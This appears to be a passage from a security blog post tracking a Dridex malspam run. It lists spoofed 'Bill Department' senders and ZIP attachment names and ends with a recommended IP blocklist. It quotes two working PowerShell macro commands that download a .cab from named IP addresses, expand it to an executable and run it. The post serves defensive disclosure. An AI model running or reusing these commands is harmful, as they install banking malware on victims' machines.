According to the Malwr report, it drops the same Dridex DLL that has been doing the rounds all day, with a VirusTotal detection rate of 8/57.
Update:
A second spam run is happening, with various senders and subjects, for example:
Byron Pittman , Bill DepartmentThere are three different ZIP files, containing either Order.xls, Confirmation.xls or order_tatus.xls (sic). The macro is similar to the one above, but has a couple of other download locations.
Freda Kelly , Bill Department
Leroy Gallegos , Bill Department
Terrence Reyes , Bill Department
Tyson Miller , Bill Department
Marlene Morales , Bill Department
Royal Byrd , Bill Department
Larry Kramer , Bill Department
Jenna Sparks , Bill Department
Debra Thomas , Bill Department
LE8427_395.zip attached
MM4565_687.zip attached
SL7772_820.zip attached
MF9529_495.zip attached
DH0645_249.zip attached
ED9340_241.zip attached
HJ7305_966.zip attached
UA0899_018.zip attached
HO2362_958.zip attached
JL3695_098.zip attached
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://134.19.180.44/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.137/ssdynamooss/sspidarss.cab','%TEMP%\FgdgFFFgfgF.cab'); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;
These are:
134.19.180.44 (Global Layer, NL)
185.48.56.137 (Sinarohost, NL)
Payload is the same as before.
Recommended blocklist:
82.151.131.129
121.50.43.175
74.208.68.243
85.143.166.0/24
37.139.47.0/24
134.19.180.44
185.48.56.137
Subscribe to:
Posts (Atom)